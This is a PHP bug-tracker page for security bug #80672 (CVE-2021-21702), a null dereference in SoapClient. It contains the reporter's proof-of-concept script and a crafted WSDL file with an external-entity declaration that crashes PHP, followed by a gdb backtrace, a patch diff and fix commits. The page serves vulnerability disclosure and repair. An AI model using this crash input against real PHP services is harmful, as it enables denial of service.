php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #80672 Null Dereference in SoapClient
Submitted: 2021-01-26 16:12 UTC Modified: 2021-02-01 08:15 UTC
From: jgalindo at datto dot com Assigned: stas (profile)
Status: Closed Package: SOAP related
PHP Version: 7.4.14 OS: Ubuntu
Private report: No CVE-ID: 2021-21702
 [2021-01-26 16:12 UTC] jgalindo at datto dot com
Description:
------------
PHP will crash with a SIGSEGV whenever an XML is provided to the SoapClient query() function without an existing field.

Version: 
PHP 7.4.11 (cli) (built: Oct  6 2020 10:34:39) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.11, Copyright (c), by Zend Technologies


Notes:
I did not compile with symbols, but it looks like the issue arises in node_is_equal_ex() when checking the child node name. I tested this using php and python3.

Reproduce steps:
1. Copy xxe.xml to current directory
2. Start python server: python3 -m http.server 80
3. Run crash.php: php crash.php
php crash.php

Test script:
---------------
crash.php:
$credential = array("username", "password");
$soap = new SoapClient("http://localhost/xxe.xml", $credential);
$query = $soap->query(array('sXML' => 'something'));

xxe.xml:
<?xml version="1.0" encoding="ISO-8859-1"?>
<soap:definitions xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  xmlns:soap="http://schemas.xmlsoap.org/wsdl/">
<![CDATA[<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://localhost:8080/VULNERABLE"> %xxe;]><foo>l</foo>]]>
</soap:definitions>

Expected result:
----------------
The query would fail gracefully.

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
__strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:209
209     ../sysdeps/x86_64/multiarch/../strcmp.S: No such file or directory.
(gdb) bt full
#0  __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:209
No locals.
#1  0x00000000005c9f8a in node_is_equal_ex ()
No symbol table info available.
#2  0x00000000005c25e3 in ?? ()
No symbol table info available.
#3  0x00000000005c2d08 in ?? ()
No symbol table info available.
#4  0x00000000005c4601 in get_sdl ()
No symbol table info available.
#5  0x000000000058ef58 in zim_SoapClient_SoapClient ()
No symbol table info available.
#6  0x00000000006d5f9b in dtrace_execute_internal ()
No symbol table info available.
#7  0x00007ffff5528476 in xdebug_execute_internal (current_execute_data=0x7ffff7fa7660, fci=0x0, return_value_used=0)
    at /build/buildd/xdebug-2.2.3/xdebug-2.2.3/xdebug.c:1551
        edata = <optimized out>
        fse = 0x1213880
        cur_opcode = <optimized out>
        do_return = 0
        function_nr = 1
        restore_error_handler_situation = 1
        tmp_error_cb = <optimized out>
#8  0x0000000000795390 in ?? ()
No symbol table info available.
#9  0x000000000070fcc8 in execute_ex ()
No symbol table info available.
#10 0x00000000006d5e99 in dtrace_execute_ex ()
No symbol table info available.
#11 0x00007ffff5527a7c in xdebug_execute_ex (execute_data=0x7ffff7fa7660) at /build/buildd/xdebug-2.2.3/xdebug-2.2.3/xdebug.c:1437
        op_array = 0x7ffff7fdbc58
        edata = <optimized out>
        dummy = 0xecd608 <compiler_globals+392>
        fse = 0x1213720
        xfse = <optimized out>
        magic_cookie = <optimized out>
        do_return = 0
        function_nr = 0
        le = <optimized out>
        eval_id = <optimized out>
        clear = 1
        return_val = 0x0
#12 0x00000000006e7520 in zend_execute_scripts ()
No symbol table info available.
#13 0x0000000000687d65 in php_execute_script ()
No symbol table info available.
#14 0x000000000079736e in ?? ()
No symbol table info available.
#15 0x00000000004617c0 in main ()
No symbol table info available.


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2021-01-28 12:37 UTC] cmb@php.net
I can confirm the null pointer dereference.  An apparent fix would
be:


 ext/soap/php_xml.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ext/soap/php_xml.c b/ext/soap/php_xml.c
index b606030179..df376d6027 100644
--- a/ext/soap/php_xml.c
+++ b/ext/soap/php_xml.c
@@ -215,7 +215,7 @@ int attr_is_equal_ex(xmlAttrPtr node, char *name, char *ns)
 
 int node_is_equal_ex(xmlNodePtr node, char *name, char *ns)
 {
-	if (name == NULL || strcmp((char*)node->name, name) == 0) {
+	if (name == NULL || (node->name && strcmp((char*)node->name, name) == 0)) {
 		if (ns) {
 			xmlNsPtr nsPtr = node_find_ns(node);
 			if (nsPtr) {


I don't know enough about SOAP to assess whether this is the
proper fix, though.
 [2021-01-28 14:24 UTC] jgalindo at datto dot com
With this being DoS-able, will a CVE be assigned to this?
 [2021-01-29 06:20 UTC] stas@php.net
-CVE-ID: +CVE-ID: 2021-21702
 [2021-01-29 06:20 UTC] stas@php.net
Since it's in SoapClient, looks like needing CVE.
 [2021-01-29 06:22 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2021-02-01 08:16 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=3c939e3f69955d087e0bb671868f7267dfb2a502
Log: Fix bug #80672 - Null Dereference in SoapClient
 [2021-02-01 08:16 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2021-02-01 08:17 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=3c939e3f69955d087e0bb671868f7267dfb2a502
Log: Fix bug #80672 - Null Dereference in SoapClient
 [2021-02-02 19:19 UTC] carusogabriel@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f733ee195462201b2cbd1d17df2f752ee88771ba
Log: Fix bug #80672 - Null Dereference in SoapClient
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Fri Aug 06 01:01:23 2021 UTC